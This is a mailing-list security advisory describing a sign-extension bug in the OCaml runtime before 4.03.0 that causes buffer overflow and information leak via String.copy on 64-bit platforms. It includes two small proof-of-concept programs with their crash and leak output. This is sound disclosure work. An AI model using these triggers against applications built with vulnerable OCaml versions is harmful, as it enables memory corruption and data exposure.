oss-sec mailing list archives
buffer overflow and information leak in OCaml < 4.03.0
From: Pascal Cuoq <cuoq () trust-in-soft com>
Date: Fri, 29 Apr 2016 00:18:22 +0000
OCaml versions 4.02.3 and earlier have a runtime bug that, on 64-bit platforms, causes sizes arguments to an internal memmove call to be sign-extended from 32 to 64-bits before being passed to the memmove function. This leads arguments between 2GiB and 4GiB to be interpreted as larger than they are (specifically, a bit below 2^64), causing a buffer overflow. Arguments between 4GiB and 6GiB are interpreted as 4GiB smaller than they should be, causing a possible information leak. This commit fixes the bug: https://github.com/ocaml/ocaml/commit/659615c7b100a89eafe6253e7a5b9d84d0e8df74#diff-a97df53e3ebc59bb457191b496c90762 The function caml_bit_string is called indirectly from such functions as String.copy. String.copy for instance is supposed to be a "safe" function for which OCaml's memory safety guarantees apply. Proof of concept: - buffer overflow Hexa:~ $ ocamlopt -v The OCaml native-code compiler, version 4.00.1 Standard library directory: /usr/local/Frama-C/ocaml-4.00.1p/lib/ocaml Hexa:~ $ cat buffer_ovflw.ml open Printf let s1 = String.make 0x80000003 'a';; let () = Printf.printf "%c" s1.[1];; let s2 = String.copy s1;; let () = Printf.printf "%c" s2.[1];; Hexa:~ $ ocamlopt buffer_ovflw.ml && ./a.out Segmentation fault: 11 - information leak Hexa:~ $ cat infoleak.ml let s1 = String.make 0x100000003 'a';; let () = Printf.printf "%c" s1.[1];; let s2 = String.copy s1;; let () = for i = 4 to 40 do Printf.printf "%2x" (Char.code s2.[i]); done; Printf.printf "\n" ;; Hexa:~ $ ocamlopt infoleak.ml && ./a.out a 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 OCaml applications, compiled with OCaml 4.02.3 or earlier on a 64-bit platform, that apply the defective copy functions to untrusted inputs are at risk. These applications should be recompiled with OCaml 4.03.0.
Current thread:
- buffer overflow and information leak in OCaml < 4.03.0 Pascal Cuoq (Apr 28)
- Re: buffer overflow and information leak in OCaml < 4.03.0 cve-assign (Apr 29)